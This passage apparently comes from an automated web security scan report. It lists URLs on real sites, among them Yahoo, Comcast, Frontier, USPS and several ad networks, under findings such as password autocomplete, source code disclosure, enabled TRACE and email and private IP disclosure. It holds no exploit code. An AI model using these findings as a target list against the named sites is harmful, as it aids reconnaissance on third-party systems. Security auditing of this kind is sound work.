10.31. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

10.32. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

10.33. http://ads.pointroll.com/PortalServe/

10.34. http://adserver.teracent.net/tase/ad

10.35. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

10.36. http://ak1.abmr.net/is/www.burstnet.com

10.37. http://autos.yahoo.com/darla/fc.php

10.38. http://autos.yahoo.com/darla/md.php

10.39. http://b.scorecardresearch.com/b

10.40. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

10.41. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

10.42. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

10.43. http://ehg-verizon.hitbox.com/HG

10.44. http://espanol.vonage.com/mpel.js

10.45. http://external.dmtracker.com/tags/vs.js

10.46. http://finance.yahoo.com/

10.47. http://finance.yahoo.com/q

10.48. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

10.49. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

10.50. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

10.51. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js

10.52. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js

10.53. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

10.54. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

10.55. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

10.56. http://frontier.com/Controls/VirtualCode.ashx

10.57. http://frontier.com/Js/formHelpers.js

10.58. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

10.59. http://frontier.com/Js/jQuery/jquery.maskedinput.js

10.60. http://frontier.com/Js/s_code.js

10.61. http://frontier.com/Resources/3rdParty/HBX/hbx.js

10.62. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

10.63. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

10.64. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

10.65. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

10.66. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

10.67. http://frontier.com/images/FTRMain/frontier_Logo.jpg

10.68. http://frontier.com/images/FTRMain/gradientBox.png

10.69. http://frontier.com/images/FTRMain/small_arrow.png

10.70. http://frontier.com/images/icon_print.gif

10.71. http://frontier.com/js/jquery/jquery.numeric.js

10.72. http://frontier.my.yahoo.com/

10.73. http://frontier.my.yahoo.com/e/js

10.74. http://gdyn.pgatour.com/1.1/1.gif

10.75. http://int.teracent.net/tase/int

10.76. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

10.77. http://maps.yahoo.com/

10.78. http://marketing.aptela.com/js/mktFormSupport.js

10.79. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

10.80. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js

10.81. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js

10.82. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js

10.83. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js

10.84. http://optimized-by.rubiconproject.com/a/dk.js

10.85. http://pixel.fetchback.com/serve/fb/pdc

10.86. http://pixel.quantserve.com/api/segments.json

10.87. http://pixel.quantserve.com/pixel

10.88. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

10.89. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

10.90. http://redirect.rtrk.com/redirect

10.91. http://sales.liveperson.net/hc/21807557/

10.92. http://sales.liveperson.net/hc/21807557/

10.93. http://sales.liveperson.net/hc/21807557/

10.94. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

10.95. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

10.96. http://sdc.usps.com/dcs731qdj000004f27giixw3q_2i4w/dcs.gif

10.97. http://sdc.usps.com/dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif

10.98. http://sensor2.suitesmart.com/sensor4.js

10.99. http://sports.yahoo.com/mlb/recap

10.100. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

10.101. http://testdm.travelers.com/trvwics.gif

10.102. http://thesearchagency.net/pixspike.php

10.103. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

10.104. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

10.105. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

10.106. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

10.107. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

10.108. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

10.109. http://udmserve.net/udm/img.fetch

10.110. http://utdi.reachlocal.com/

10.111. http://utdi.reachlocal.net/index.html

10.112. http://video.music.yahoo.com/up/fop/process/getPlaylistFOP.php

10.113. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.114. http://www.aptela.com/mainstylesheet.css/

10.115. http://www.aptela.com/misc/privacy-policy/

10.116. http://www.aptela.com/my-account/

10.117. http://www.aptela.com/my-account/login-error/

10.118. http://www.burstnet.com/enlightn/8117/3E06/

10.119. http://www.comcast.com/includes/js/CookieHelper.js

10.120. http://www.comcast.com/includes/omniture/s_code.js

10.121. https://www.comcast.com/Localization/Localize.cspx

10.122. https://www.comcast.com/includes/js/IDGenerator.ashx

10.123. http://www.fairpoint.com/residential/

10.124. http://www.fairpoint.com/servlet/CityTelcoMappingServlet

10.125. http://www.frontier.com/Js/s_code.js

10.126. http://www.frontierpages.com/SelectRegion.asp

10.127. http://www.frontierpages.com/scripts/s_code.js

10.128. http://www.googleadservices.com/pagead/aclk

10.129. http://www.myfitv.com/

10.130. http://www.myfitv.com/portal/recent_tv_elastic

10.131. http://www.myfitv.com/search

10.132. http://www.zillow.com/app

11. Password field with autocomplete enabled

11.1. https://login.comcast.net/login

11.2. https://login.frontier.com/webmail/

11.3. https://login.yahoo.com/config/login_verify2

11.4. http://www.aptela.com/my-account/

11.5. http://www.aptela.com/my-account/login-error/

11.6. https://www.frontier.com/AgentOrdering/Login/

11.7. https://www.frontier.com/AgentOrdering/Login/Default.aspx

11.8. https://www.frontier.com/BillPay/Login.aspx

11.9. https://www.frontier.com/Shop/Login.aspx

11.10. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

11.11. https://www.usps.com/ContentTemplates/common/scripts/login.js

11.12. http://www.vonage.com/

11.13. http://www.whitefence.com/404.html

11.14. http://www.whitefence.com/category/high-speed-internet/

11.15. http://www.whitefence.com/category/home-phone/

11.16. http://www.whitefence.com/category/television-service/

12. Source code disclosure

12.1. http://frontier.my.yahoo.com/

12.2. http://www.aptela.com/my-account/

12.3. http://www.aptela.com/my-account/login-error/

13. Referer-dependent response

13.1. http://f.fontdeck.com/f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff

13.2. http://f.fontdeck.com/f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff

13.3. http://f.fontdeck.com/f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff

13.4. http://f.fontdeck.com/f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff

13.5. http://ichart.finance.yahoo.com/instrument/1.0/%5EDJI/chart

13.6. http://sitesearch.comcast.com/

13.7. http://use.typekit.com/k/apb3goi-d.css

13.8. http://www.facebook.com/plugins/like.php

13.9. http://www.facebook.com/plugins/likebox.php

13.10. http://www.whitefence.com/category/high-speed-internet/

13.11. http://www.whitefence.com/category/home-phone/

13.12. http://www.whitefence.com/category/television-service/

14. Cross-domain POST

14.1. https://login.frontier.com/webmail/

14.2. http://www.aptela.com/lp2011/T2V1/

14.3. http://www.aptela.com/lp2011/T2V1/

14.4. http://www.frontierhelp.com/frontiernetnews.cfm

14.5. http://www.frontierhelp.com/techsupport.cfm

15. Cross-domain Referer leakage

15.1. http://ad.agkn.com/iframe!t=1129!

15.2. http://ad.agkn.com/iframe!t=1131!

15.3. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

15.4. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

15.5. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

15.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

15.7. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

15.8. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

15.9. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

15.10. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

15.11. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36

15.12. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36

15.13. http://ad.doubleclick.net/adj/N3880.SD153730.3880/B5030675.119

15.14. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3

15.15. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3

15.16. http://ad.doubleclick.net/adj/N6092.yahoo.com/B5098223.114

15.17. http://ad.doubleclick.net/adj/ober.frontier/product_119282623

15.18. http://ad.doubleclick.net/adj/ober.frontier/product_undefined

15.19. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599

15.20. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

15.21. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877

15.22. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

15.23. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208

15.24. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

15.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276

15.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063

15.27. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

15.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

15.29. http://ad.yieldmanager.com/iframe3

15.30. http://ad.yieldmanager.com/iframe3

15.31. http://ad.yieldmanager.com/iframe3

15.32. http://ad.yieldmanager.com/iframe3

15.33. http://ad.yieldmanager.com/iframe3

15.34. http://ad.yieldmanager.com/iframe3

15.35. http://ad.yieldmanager.com/iframe3

15.36. http://ad.yieldmanager.com/iframe3

15.37. http://ad.yieldmanager.com/iframe3

15.38. http://ad.yieldmanager.com/iframe3

15.39. http://ad.yieldmanager.com/iframe3

15.40. http://ad.yieldmanager.com/iframe3

15.41. http://ad.yieldmanager.com/iframe3

15.42. http://admin.brightcove.com/js/BrightcoveExperiences_all.js

15.43. http://adserver.teracent.net/tase/ad

15.44. http://adserver.teracent.net/tase/ad

15.45. http://as.casalemedia.com/j

15.46. http://as.casalemedia.com/j

15.47. http://as.casalemedia.com/j

15.48. http://as.casalemedia.com/j

15.49. http://as.casalemedia.com/j

15.50. http://as1.suitesmart.com/99917/G15493.js

15.51. http://autos.yahoo.com/darla/fc.php

15.52. http://autos.yahoo.com/darla/fc.php

15.53. http://beacon.dedicatednetworks.com/js/t.aspx

15.54. http://cm.g.doubleclick.net/pixel

15.55. http://cm.g.doubleclick.net/pixel

15.56. http://cm.g.doubleclick.net/pixel

15.57. http://customer.comcast.com/Pages/FAQDisplay.aspx

15.58. http://customer.comcast.com/Pages/FAQViewer.aspx

15.59. http://finance.yahoo.com/lookup

15.60. http://finance.yahoo.com/q

15.61. http://frontier.com/winwin1

15.62. http://games.frontier.com/game.htm

15.63. http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

15.64. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

15.65. http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click

15.66. http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk

15.67. http://ib.adnxs.com/seg

15.68. http://ib.adnxs.com/ttj

15.69. http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js

15.70. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php

15.71. http://l.yimg.com/zz/combo

15.72. http://l.yimg.com/zz/combo

15.73. http://l.yimg.com/zz/combo

15.74. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

15.75. https://login.comcast.net/myaccount/lookup

15.76. https://login.frontiermobile.com/

15.77. https://login.yahoo.com/config/login_verify2

15.78. http://maps.yahoo.com/darla_fc

15.79. http://maps.yahoo.com/darla_fc

15.80. http://maps.yahoo.com/pvproxy

15.81. http://new.music.yahoo.com/recommendedHP/

15.82. http://omg.yahoo.com/xhr/ad/LREC/2115806991

15.83. http://pixel.everesttech.net/2565/c

15.84. http://pro.tweetmeme.com/button.js

15.85. http://realestate.yahoo.com/darla/fc.php

15.86. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale

15.87. http://redirect.rtrk.com/redirect

15.88. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

15.89. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

15.90. http://search.keywordblocks.com/

15.91. http://search.keywordblocks.com/

15.92. http://search.yahoo.com/search

15.93. http://shop.comcast.com/XFINITY/voice/

15.94. http://shopping.yahoo.com/search

15.95. http://show.partners-z.com/s/show

15.96. http://sitesearch.comcast.com/

15.97. http://sports.yahoo.com/mlb/recap

15.98. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

15.99. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

15.100. http://udmserve.net/udm/img.fetch

15.101. https://us.etrade.com/e/t/jumppage/viewjumppage

15.102. http://utdi.reachlocal.com/

15.103. http://utdi.reachlocal.net/index.html

15.104. http://view.atdmt.com/TR1/iview/332867993/direct/01

15.105. http://view.atdmt.com/TR1/iview/332867993/direct/01

15.106. http://view.atdmt.com/TR1/iview/332867993/direct/01

15.107. http://view.atdmt.com/TR1/iview/332867993/direct/01

15.108. http://view.atdmt.com/ULA/iview/351127232/direct/01

15.109. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

15.110. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

15.111. http://www.aptela.com/lp2011/T2V1/

15.112. http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html

15.113. https://www.comcast.com/Localization/Localize.cspx

15.114. http://www.facebook.com/plugins/activity.php

15.115. http://www.facebook.com/plugins/likebox.php

15.116. http://www.facebook.com/plugins/likebox.php

15.117. http://www.facebook.com/plugins/likebox.php

15.118. http://www.google.com/search

15.119. http://www.myfitv.com/javascripts/all.js

15.120. http://www.myfitv.com/search

15.121. http://www.myfitv.com/search

15.122. http://www.scottrade.com/online-trading.html

15.123. http://www.vonage.com/

15.124. http://www.vonage.com/search.php

15.125. http://www.xfinity.com/js-api/compressed/xpbar.js

15.126. http://www.xfinity.com/js-api/compressed/xpbar.js

15.127. http://xfinity.comcast.net/xpbar/1/default/

15.128. http://xfinity.comcast.net/xpbar/2/default/

15.129. http://yp.frontierpages.com/results.aspx

16. Cross-domain script include

16.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

16.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

16.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

16.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

16.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

16.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

16.7. http://ad.yieldmanager.com/iframe3

16.8. http://ad.yieldmanager.com/iframe3

16.9. http://ad.yieldmanager.com/iframe3

16.10. http://ad.yieldmanager.com/iframe3

16.11. http://autos.yahoo.com/

16.12. http://autos.yahoo.com/bentley/continental-gtc/2011/

16.13. http://cdn.optmd.com/V2/80181/197812/index.html

16.14. http://cdn.optmd.com/V2/80181/197813/index.html

16.15. http://customer.comcast.com/Pages/FAQViewer.aspx

16.16. http://finance.yahoo.com/

16.17. http://finance.yahoo.com/lookup

16.18. http://finance.yahoo.com/q

16.19. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

16.20. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566

16.21. http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087

16.22. http://frontier.my.yahoo.com/

16.23. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php

16.24. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

16.25. https://login.comcast.net/myaccount/lookup

16.26. https://login.yahoo.com/config/login_verify2

16.27. http://maps.yahoo.com/

16.28. http://movies.yahoo.com/

16.29. http://new.music.yahoo.com/

16.30. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

16.31. http://omg.yahoo.com/

16.32. http://pro.tweetmeme.com/button.js

16.33. http://realestate.yahoo.com/

16.34. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale

16.35. http://servicetips.whitefence.com/

16.36. http://shopping.yahoo.com/

16.37. http://shopping.yahoo.com/search

16.38. http://sitesearch.comcast.com/

16.39. http://sports.yahoo.com/

16.40. http://sports.yahoo.com/

16.41. http://sports.yahoo.com/mlb/recap

16.42. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

16.43. http://support.aptela.com:9000/tools/ResetPassword.cgi

16.44. http://udmserve.net/udm/img.fetch

16.45. https://us.etrade.com/e/t/jumppage/viewjumppage

16.46. http://utdi.reachlocal.net/index.html

16.47. http://view.atdmt.com/TR1/iview/332867993/direct/01

16.48. http://www.aptela.com/lp2011/T2V1/

16.49. http://www.aptela.com/mainstylesheet.css/

16.50. http://www.aptela.com/misc/privacy-policy/

16.51. http://www.aptela.com/my-account/

16.52. http://www.aptela.com/my-account/login-error/

16.53. http://www.comcast.com/Corporate/Customers/custcare.html

16.54. http://www.comcast.com/Movers/Move.cspx

16.55. https://www.comcast.com/Localization/Localize.cspx

16.56. https://www.comcastsupport.com/ChatEntry/

16.57. https://www.comcastsupport.com/chatentry/Default.aspx

16.58. http://www.facebook.com/plugins/activity.php

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.fairpoint.com/residential/

16.61. http://www.frontier.com/

16.62. http://www.myfitv.com/

16.63. http://www.myfitv.com/portal/recent_tv_elastic

16.64. http://www.myfitv.com/search

16.65. http://www.ooma.com/

16.66. http://www.ooma.com/premier

16.67. http://www.ooma.com/premier/features

16.68. http://www.vonage.com/

16.69. http://www.whitefence.com/404.html

16.70. http://www.whitefence.com/category/high-speed-internet/

16.71. http://www.whitefence.com/category/home-phone/

16.72. http://www.whitefence.com/category/television-service/

17. TRACE method is enabled

17.1. http://40.xg4ken.com/

17.2. http://ads.media.net/

17.3. http://gdyn.pgatour.com/

17.4. http://integrate.112.2o7.net/

17.5. https://login.aptela.com/

17.6. http://mi.adinterax.com/

17.7. http://optimized-by.rubiconproject.com/

17.8. http://pixel.everesttech.net/

17.9. http://pixel.fetchback.com/

17.10. http://sensor2.suitesmart.com/

17.11. http://show.partners-z.com/

17.12. http://sitesearch.comcast.com/

17.13. http://support.aptela.com:9000/

17.14. http://www.aptela.com/

17.15. http://www.fairpoint.com/

17.16. http://www.myfitv.com/

17.17. http://www.ooma.com/

17.18. http://www.pgatour.com/

17.19. http://www.vonage.com/

17.20. http://www.whitefence.com/

17.21. http://www2.whitefence.com/

18. Email addresses disclosed

18.1. http://autos.yahoo.com/bentley/continental-gtc/2011/

18.2. http://forums.comcast.com/html/js/s_code.js

18.3. http://games.frontier.com/BodyScripts.aspx

18.4. http://games.frontier.com/game.htm

18.5. http://l.yimg.com/a/combo

18.6. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

18.7. https://login.comcast.net/myaccount/js/omniture.js

18.8. https://login.comcast.net/static/js/omniture.js

18.9. https://login.yahoo.com/config/login_verify2

18.10. http://postcalc.usps.gov/

18.11. http://sitesearch.comcast.com/

18.12. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

18.13. http://utdi.reachlocal.net/index.html

18.14. http://www.aptela.com/mainstylesheet.css/

18.15. http://www.aptela.com/misc/privacy-policy/

18.16. http://www.aptela.com/my-account/

18.17. http://www.aptela.com/my-account/login-error/

18.18. http://www.comcast.com/Movers/Move.cspx

18.19. https://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js

18.20. https://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js

18.21. https://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js

18.22. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js

18.23. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js

18.24. http://www.fairpoint.com/scripts/jquery/plugins/selectToUISlider.jQuery.js

18.25. http://www.frontier.com/yahoo/js/CCallWrapper.js

18.26. http://www.frontierhelp.com/frontiernetnews.cfm

18.27. http://www.frontierhelp.com/func.js

18.28. https://www.frontiermobile.com/data/Js/s_code.js

18.29. http://www.frontierpages.com/scripts/s_code.js

18.30. http://www.myfitv.com/javascripts/all.js

18.31. http://www.myfitv.com/javascripts/jquery.hoverIntent.js

18.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

18.33. https://www.optionshouse.com/tool/2011.09.01.19.07/asset/coreuiConcatMin.js

18.34. https://www.usps.com/ContentTemplates/assets/css/components.css

18.35. https://www.usps.com/ContentTemplates/assets/css/home.css

18.36. https://www.usps.com/ContentTemplates/assets/css/templates.css

18.37. https://www.usps.com/ContentTemplates/common/css/fonts.css

18.38. https://www.usps.com/ContentTemplates/common/css/globals/button-styles.css

18.39. https://www.usps.com/ContentTemplates/common/css/globals/links.css

18.40. https://www.usps.com/ContentTemplates/common/css/globals/modals.css

18.41. https://www.usps.com/ContentTemplates/common/css/globals/qt-modals.css

18.42. https://www.usps.com/ContentTemplates/common/css/globals/text-fields.css

18.43. https://www.usps.com/ContentTemplates/common/css/globals/tooltips.css

18.44. https://www.usps.com/ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css

18.45. https://www.usps.com/ContentTemplates/common/css/usps-print.css

18.46. https://www.usps.com/ContentTemplates/common/css/usps.css

18.47. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js

18.48. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js

18.49. http://www.vonage.com/googlesearch/cluster.js

18.50. http://www.vonage.com/googlesearch/common.js

18.51. http://www.vonage.com/googlesearch/uri.js

19. Private IP addresses disclosed

19.1. http://api.facebook.com/restserver.php

19.2. http://connect.facebook.net/en_US/all.js

19.3. http://customer.comcast.com/Pages/FAQDisplay.aspx

19.4. http://external.ak.fbcdn.net/safe_image.php

19.5. http://external.ak.fbcdn.net/safe_image.php

19.6. http://external.ak.fbcdn.net/safe_image.php

19.7. http://external.ak.fbcdn.net/safe_image.php

19.8. http://external.ak.fbcdn.net/safe_image.php

19.9. http://external.ak.fbcdn.net/safe_image.php

19.10. http://external.ak.fbcdn.net/safe_image.php

19.11. http://external.ak.fbcdn.net/safe_image.php

19.12. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js

19.13. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js

